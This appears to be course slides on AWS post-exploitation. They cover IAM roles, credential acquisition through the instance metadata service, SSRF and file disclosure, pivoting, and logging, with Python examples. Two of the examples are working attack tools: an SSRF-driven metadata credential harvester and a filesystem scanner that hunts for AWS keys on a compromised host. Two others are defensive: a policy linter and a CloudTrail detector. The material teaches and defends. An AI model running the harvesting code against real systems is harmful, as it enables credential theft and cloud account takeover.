AWS & Cloud · 2018. 5. 9.

  • AWS & Cloud

  • Ext-Break

    ● Did anyone get xsscsp2?
      ○ It was a hard one lol

  • Quite. Quite hard.

    Xsscsp2 solution (PoC redacted)

  • Overview

    ● What is the cloud
    ● Who is this 4chan?
    ● Access Keys/Roles
    ● Acquiring Keys
    ● Pivoting
    ● Microservices
    ● Common Vulns

  • Note on ethics

    ● Everything here is post-exploitation
    ● Everything you do at this point is illegal if you don’t have explicit permission
    ● Most bug bounties do not permit you to do things in this realm
      ○ Unless you ask nicely
    ● This will get you a nice knock on the door from the AFP.
    ● This is purely theoretical knowledge.
    ● You may be examined on this.

  • What is the cloud

    ● You all should already know this
    ● Where we outsource the hosting of our * to a third party
    ● They provide us * level of control over the stack

  • Scales of Clouds

    *aaS

  • Impact of *aaS

    ● Differing levels of control
    ● Differing methods of exploitation/persistence/pivoting
    ● Everyone does it differently

  • Who is this 4chan? (AWS)

    ● Grab bag of everything.
    ● Whatever part of your service you want to outsource, they have an offering for it.

  • Things AWS has

  • Things most people care about

  • More things AWS has

  • More things we care about

  • Access Keys and Roles

    ● We discussed this last week
    ● What are access keys?

  • Roles & Policies

    ● Roles delegate access to AWS services: the role is assumed by an EC2 instance, Lambda function or other service rather than being tied to a user with long-lived keys.
    ● Each role carries one or more policies that set its permissions/access controls.
    ● Sometimes super permissive ("Action": "*" on "Resource": "*").
    ● More realistically, restricted permissions scoped to specific actions on specific resources.
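As an added example for these notes (not code from the slides or from AWS), the linter below reads an IAM policy document and flags the "super permissive" patterns: a bare `*` action, a service-wide `service:*` wildcard, a `*` resource, and any action that can be used to escalate privilege. Both sample policies are constructed; the escalation list is a representative subset, not an exhaustive one.

```python
"""Lint IAM policy documents for the "super permissive" pattern.

Added example for these notes, not code from the slides or from AWS. The two
policies are constructed: one wildcard-everything document and one scoped to
a single S3 bucket. Run it stand-alone to see the findings for each.
"""
import json
from fnmatch import fnmatchcase

PERMISSIVE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
})

RESTRICTED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-app-assets",
                     "arn:aws:s3:::example-app-assets/*"],
    }],
})

# Actions that turn "some access" into "more access" in one API call
# (assumption: a representative subset, not an exhaustive list).
ESCALATION_ACTIONS = (
    "iam:CreateAccessKey", "iam:PutUserPolicy", "iam:PutRolePolicy",
    "iam:AttachUserPolicy", "iam:AttachRolePolicy", "iam:PassRole",
    "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion",
    "sts:AssumeRole", "lambda:UpdateFunctionCode",
)


def _as_list(value):
    """IAM allows a bare string or a list for Action/Resource."""
    return value if isinstance(value, list) else [value]


def lint_policy(policy_json):
    """Return (statement_index, message) findings for Allow statements.

    Only Action/Resource are inspected; NotAction/NotResource and Condition
    blocks are ignored, so an empty result means "no obvious wildcards",
    not "least privilege".
    """
    findings = []
    for idx, stmt in enumerate(json.loads(policy_json)["Statement"]):
        if stmt.get("Effect") != "Allow":
            continue  # Deny can only narrow access
        actions = _as_list(stmt.get("Action", []))
        resources = _as_list(stmt.get("Resource", []))

        if "*" in actions:
            findings.append((idx, "Action '*' grants every API call"))
        else:
            wide = [a for a in actions if a.endswith(":*")]
            if wide:
                findings.append((idx, "service-wide wildcard action: " + ", ".join(wide)))

        if "*" in resources:
            findings.append((idx, "Resource '*' applies to every resource"))

        # IAM action names are globbed: "iam:*" or "iam:Put*" cover the
        # escalation actions just as a bare "*" does.
        escalators = [e for e in ESCALATION_ACTIONS
                      if any(fnmatchcase(e, pattern) for pattern in actions)]
        if escalators:
            findings.append((idx, "privilege-escalation capable: " + ", ".join(escalators)))
    return findings


if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE_POLICY), ("restricted", RESTRICTED_POLICY)):
        print(name, lint_policy(policy) or "no findings")
```

The escalation check matters more than the wildcard check: a policy with no `*` anywhere but with `iam:PutUserPolicy` or `iam:PassRole` is still effectively full access to the account.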

  • Summary

    ● AWS big.
    ● Cloud bigger.
    ● Things need permissions
    ● Access uses keys

  • Acquiring Keys

    ● Instance metadata: http://169.254.169.254/latest/meta-data/iam/info describes the instance profile; /latest/meta-data/iam/security-credentials/<role-name> returns the role’s temporary keys (AccessKeyId, SecretAccessKey, Token, Expiration)
    ● SSRF (get the application to fetch the metadata URL for you)
    ● LFD -> /docker-entrypoint.sh, /init.sh, ~/.aws/credentials, etc. etc.
    ● Use some vulnerability
    ● Leaked config files (config.json)
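The metadata path above is a two-request chain, and the following added example (written for these notes, not from the slides or from AWS) shows it: list the role names under `security-credentials/`, then fetch the credential document for that role. `fetch` is any callable that returns the body for a URL, which is where a real SSRF primitive would be plugged in; `MockMetadata` is a constructed stand-in for 169.254.169.254 serving an invented role and an already-expired set of keys, so the block runs offline.

```python
"""Walk the EC2 instance metadata service the way an SSRF chain would.

Added example for these notes, not code from the slides or from AWS.
`fetch` is any callable returning the body for a URL; in a real engagement
the SSRF primitive goes there. MockMetadata below is a constructed stand-in
for 169.254.169.254 (IMDSv1: plain GETs, no token) serving an invented role
and an already-expired set of temporary credentials.
"""
import json
from datetime import datetime, timezone

IMDS_IAM = "http://169.254.169.254/latest/meta-data/iam/"


def parse_ts(text):
    """IMDS timestamps look like 2018-05-09T12:00:00Z (UTC)."""
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


class MockMetadata:
    """Constructed responses; every value here is invented for the demo."""

    def __init__(self):
        self.responses = {
            IMDS_IAM + "info": json.dumps({
                "Code": "Success",
                "InstanceProfileArn": "arn:aws:iam::123456789012:instance-profile/web-role",
            }),
            # The listing under security-credentials/ is the role name(s).
            IMDS_IAM + "security-credentials/": "web-role",
            IMDS_IAM + "security-credentials/web-role": json.dumps({
                "Code": "Success",
                "Type": "AWS-HMAC",
                "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
                "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
                "Token": "constructed-session-token",
                "Expiration": "2018-05-09T12:00:00Z",
            }),
        }

    def __call__(self, url):
        return self.responses[url]


def harvest_instance_credentials(fetch, now=None):
    """Two requests: role name, then that role's temporary keys.

    Returns None when the instance has no role attached (the listing is
    empty, or the SSRF target surfaces the 404 as an error).
    """
    try:
        roles = fetch(IMDS_IAM + "security-credentials/").split()
    except Exception:
        return None
    if not roles:
        return None
    role = roles[0]
    doc = json.loads(fetch(IMDS_IAM + "security-credentials/" + role))
    expires = parse_ts(doc["Expiration"])
    now = now or datetime.now(timezone.utc)
    return {
        "role": role,
        "profile_arn": json.loads(fetch(IMDS_IAM + "info")).get("InstanceProfileArn"),
        "access_key_id": doc["AccessKeyId"],
        "secret_access_key": doc["SecretAccessKey"],
        "session_token": doc["Token"],
        "expires": expires,
        # Instance-role keys rotate every few hours; stale ones just 403.
        "usable": expires > now,
    }


def as_aws_env(creds):
    """Environment for `aws sts get-caller-identity`. Temporary (ASIA...)
    keys are rejected without the matching session token."""
    return {
        "AWS_ACCESS_KEY_ID": creds["access_key_id"],
        "AWS_SECRET_ACCESS_KEY": creds["secret_access_key"],
        "AWS_SESSION_TOKEN": creds["session_token"],
    }


if __name__ == "__main__":
    creds = harvest_instance_credentials(MockMetadata())
    print(creds["role"], "usable:", creds["usable"])
    print(" ".join("%s=%s" % kv for kv in as_aws_env(creds).items()))
```

Two practitioner caveats: the session token is not optional, a `ASIA…` key pair without its `AWS_SESSION_TOKEN` is simply rejected; and instances with IMDSv2 enforced require a `PUT` to obtain a token before any `GET`, so a GET-only SSRF primitive will not complete this chain.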

  • Pivoting/Post-Exploitation

    ● Why do we need to pivot?
      ○ Poor security hygiene
      ○ Breaching security boundaries
      ○ Expand control
      ○ Find internal sensitive resources

  • Wat do?

    ● If you’re on the host
      ○ Dump AWS metadata
      ○ Local privesc (if you can be stealthy)
      ○ Dump users & readable files
      ○ Dump local services/network subnet
      ○ Look for source repos
      ○ Look for private S3 buckets
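The "readable files", "source repos" and "private S3 buckets" items of that checklist collapse into one pass over the filesystem. The following added example (for these notes, not code from the slides) walks a root, skips what it cannot read, and pulls out access-key IDs, secret keys, `~/.aws/credentials` profiles and S3 bucket references. `build_constructed_host()` lays down an invented filesystem using the AWS documentation's example key pairs (never-live values) so the scan runs offline; on a real box you would point `hunt()` at `/` or at `$HOME`.

```python
"""Hunt a compromised host for AWS credentials and bucket references.

Added example for these notes, not code from the slides. It scans every
readable file under a root for access-key IDs, secret keys, ~/.aws profiles
and S3 bucket references. build_constructed_host() lays down an invented
filesystem (the AWS documentation's example key pairs, never-live values)
so the scan runs offline; on a real box point hunt() at "/" or at $HOME.
"""
import configparser
import os
import re
import tempfile

# Long-term keys start with AKIA, STS temporary keys with ASIA; 20 chars total.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[A-Z0-9]{16})\b")
# Exactly 40 chars of [A-Za-z0-9/+] within 20 chars of a "secret" hint.
SECRET_RE = re.compile(r"(?i)secret[^\n]{0,20}?([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+])")
# Bucket references: s3:// URIs or S3 ARNs.
S3_RE = re.compile(r"(?:s3://|arn:aws:s3:::)([a-z0-9.-]{3,63})")

# Constructed host contents. Keys are the AWS docs' published examples.
CONSTRUCTED_FILES = {
    "home/app/.aws/credentials":
        "[default]\n"
        "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
        "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n",
    "docker-entrypoint.sh":
        "#!/bin/sh\n"
        "export AWS_ACCESS_KEY_ID=AKIAI44QH8DHBEXAMPLE\n"
        "export AWS_SECRET_ACCESS_KEY=je7MtGbClwBF/2Zp9Utk/h3yCo8nvbEXAMPLEKEY\n"
        'exec "$@"\n',
    "srv/app/config.json":
        '{"region": "ap-southeast-2", "backup_target": "s3://internal-backups-prod"}\n',
    "var/log/app.log": "2018-05-09 nothing interesting here\n",
}


def scan_text(text, origin):
    """Regex pass over one file's contents -> [(origin, kind, value)]."""
    found = [(origin, "access_key_id", m.group(1)) for m in ACCESS_KEY_RE.finditer(text)]
    found += [(origin, "secret_access_key", m.group(1)) for m in SECRET_RE.finditer(text)]
    found += [(origin, "s3_bucket", m.group(1)) for m in S3_RE.finditer(text)]
    return found


def aws_profiles(text, origin):
    """~/.aws/credentials is INI: one [profile] section per identity."""
    parser = configparser.ConfigParser()
    try:
        parser.read_string(text)
    except configparser.Error:
        return []
    return [(origin, "profile", section) for section in parser.sections()]


def hunt(root, max_size=1_000_000):
    """Walk root; skip unreadable or huge files instead of dying on them."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_size or not os.access(path, os.R_OK):
                    continue
                with open(path, "r", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue  # vanished, special file, permission race: move on
            findings.extend(scan_text(text, path))
            if name == "credentials":
                findings.extend(aws_profiles(text, path))
    return findings


def build_constructed_host():
    """Write CONSTRUCTED_FILES into a fresh temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="pivot-demo-")
    for rel, body in CONSTRUCTED_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for origin, kind, value in sorted(hunt(build_constructed_host())):
        print("%-18s %-50s %s" % (kind, origin, value))
```

The secret-key pattern is deliberately anchored to a nearby "secret" hint: 40 characters of base64-looking text on its own matches far too much (hashes, tokens, minified JS), and the scan is noisy enough already on a real box.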

  • Be careful, it’s dangerous out there

    ● Be careful of logging
      ○ AWS CloudWatch / CloudTrail
      ○ Logs all API activity
      ○ Logs all errors (a denied call is still a recorded call)
      ○ Logs all logins
      ○ (Depending on configuration)

    https://www.blackhat.com/docs/us-16/materials/us-16-Amiga-Account-Jumping-Post-Infection-Persistency-And-Lateral-Movement-In-AWS-wp.pdf
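What "logs all activity" means in practice is worth seeing from the defender's side. In the added example below (for these notes, not code from the slides or from AWS), stolen instance-role credentials show up in CloudTrail as an `AssumedRole` session whose ARN ends in the instance id, and the giveaway is the `sourceIPAddress`: the real instance calls from its own public IP or from inside the VPC, the attacker calls from somewhere else. The CloudTrail records are constructed and trimmed to the fields used; `EXPECTED_SOURCES` stands for the defender's knowledge of where each instance actually sits.

```python
"""Spot instance-role credentials being used from off the instance.

Added example for these notes, not code from the slides or from AWS. The
CloudTrail records below are constructed (trimmed to the fields used; real
events carry many more). EXPECTED_SOURCES is the defender's knowledge of
where each instance actually sits: its public IP and its VPC range.
"""
import ipaddress

ACCOUNT = "123456789012"
ROLE_SESSION_ARN = "arn:aws:sts::" + ACCOUNT + ":assumed-role/web-role/i-0abc123def456"

# Constructed records. When an EC2 instance uses its role, CloudTrail shows
# type AssumedRole with the instance id as the session name in the ARN.
TRAIL = [
    {   # the application itself, from inside the VPC
        "eventTime": "2018-05-09T10:02:11Z", "eventSource": "s3.amazonaws.com",
        "eventName": "GetObject", "sourceIPAddress": "10.0.4.12",
        "userAgent": "[aws-sdk-java/1.11.300 Linux/4.14 OpenJDK_64-Bit_Server_VM]",
        "userIdentity": {"type": "AssumedRole", "arn": ROLE_SESSION_ARN,
                         "accessKeyId": "ASIAIOSFODNN7EXAMPLE"},
    },
    {   # same session keys, replayed from an attacker's box with the CLI
        "eventTime": "2018-05-09T10:15:40Z", "eventSource": "sts.amazonaws.com",
        "eventName": "GetCallerIdentity", "sourceIPAddress": "198.51.100.23",
        "userAgent": "aws-cli/1.15.10 Python/3.6.5 Linux/4.15.0 botocore/1.10.10",
        "userIdentity": {"type": "AssumedRole", "arn": ROLE_SESSION_ARN,
                         "accessKeyId": "ASIAIOSFODNN7EXAMPLE"},
    },
    {   # denied call: CloudTrail logs the attempt anyway, with errorCode
        "eventTime": "2018-05-09T10:16:02Z", "eventSource": "iam.amazonaws.com",
        "eventName": "ListUsers", "sourceIPAddress": "198.51.100.23",
        "userAgent": "aws-cli/1.15.10 Python/3.6.5 Linux/4.15.0 botocore/1.10.10",
        "errorCode": "AccessDenied",
        "userIdentity": {"type": "AssumedRole", "arn": ROLE_SESSION_ARN,
                         "accessKeyId": "ASIAIOSFODNN7EXAMPLE"},
    },
    {   # a human with an IAM user: not an instance session, ignored here
        "eventTime": "2018-05-09T11:00:00Z", "eventSource": "ec2.amazonaws.com",
        "eventName": "DescribeInstances", "sourceIPAddress": "203.0.113.77",
        "userAgent": "console.amazonaws.com",
        "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::" + ACCOUNT + ":user/alice"},
    },
]

# Instance id -> (public IP, VPC CIDR). Constructed for the demo.
EXPECTED_SOURCES = {"i-0abc123def456": ("203.0.113.10/32", "10.0.0.0/16")}


def instance_session_id(record):
    """Instance id if this is an EC2 instance-profile session, else None."""
    identity = record.get("userIdentity", {})
    if identity.get("type") != "AssumedRole":
        return None
    session_name = identity.get("arn", "").rsplit("/", 1)[-1]
    return session_name if session_name.startswith("i-") else None


def flag_offbox_role_use(records, expected=EXPECTED_SOURCES):
    """Return the records where an instance's role was used from an
    address outside that instance's known public IP and VPC range."""
    hits = []
    for record in records:
        instance_id = instance_session_id(record)
        if instance_id is None:
            continue
        try:
            source = ipaddress.ip_address(record["sourceIPAddress"])
        except ValueError:
            continue  # e.g. "ec2.amazonaws.com" when a service made the call
        allowed = [ipaddress.ip_network(net) for net in expected.get(instance_id, ())]
        if not any(source in net for net in allowed):
            hits.append({
                "instance_id": instance_id,
                "eventName": record["eventName"],
                "sourceIPAddress": record["sourceIPAddress"],
                "userAgent": record.get("userAgent", ""),
                "errorCode": record.get("errorCode"),
            })
    return hits


if __name__ == "__main__":
    for hit in flag_offbox_role_use(TRAIL):
        print(hit)
```

Note the third record: the `iam:ListUsers` call was denied, yet it is still in the trail with `errorCode: AccessDenied`. That is what "logs all errors" means for an attacker enumerating what a stolen role can do; every probe is a line in someone's log.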

  • Threat Modelling

    ● Attacking Netflix vs attacking Yahoo.com:
      ○ One has a really good security posture
      ○ One has legacy code from the 90s
      ○ Which one is going to have better logging and infrastructure?

  • Bleeding Edge

    ● Microservices

  • Scales of Clouds

    *aaS

  • Serverless/Lambda model

    ● You only provide a function.
    ● It runs in an execution environment only as long as the function runs.
    ● After that everything is nominally deleted. In practice AWS reuses warm execution environments between invocations, so state left in /tmp or in the process can survive to the next call; the Krug serverless talk in the extra reading is built on exactly that.

  • Stolen Slides

  • Exploitation

    ● Exfil is easy: the function can make outbound requests, so you can get info out.

  • Extra reading

    ● Account jumping, post-infection persistency and lateral movement in AWS - https://www.blackhat.com/docs/us-16/materials/us-16-Amiga-Account-Jumping-Post-Infection-Persistency-And-Lateral-Movement-In-AWS-wp.pdf
    ● Pivoting in AWS - https://blackhat.com/docs/us-14/materials/us-14-Riancho-Pivoting-In-Amazon-Clouds.pdf
    ● Serverless Runtime - https://www.blackhat.com/docs/us-17/wednesday/us-17-Krug-Hacking-Severless-Runtimes-wp.pdf
    ● Slide deck for notes - https://www.blackhat.com/docs/us-17/wednesday/us-17-Krug-Hacking-Severless-Runtimes.pdf
    ● Offensive Security - https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Ryan-Baxendale-Microservices-and-FaaS-for-Offensive-Security.pdf
    ● Post compromise AWS - https://danielgrzelak.com/exploring-an-aws-account-after-pwning-it-ff629c2aae39
    ● AWS Cloud Recon (a bit basic) - https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Gerald-Steere-and-Sean-Metcalf-Hacking-the-Cloud.pdf
    ● Great talk on microservice exploitation - https://www.youtube.com/watch?v=YZ058hmLuv0
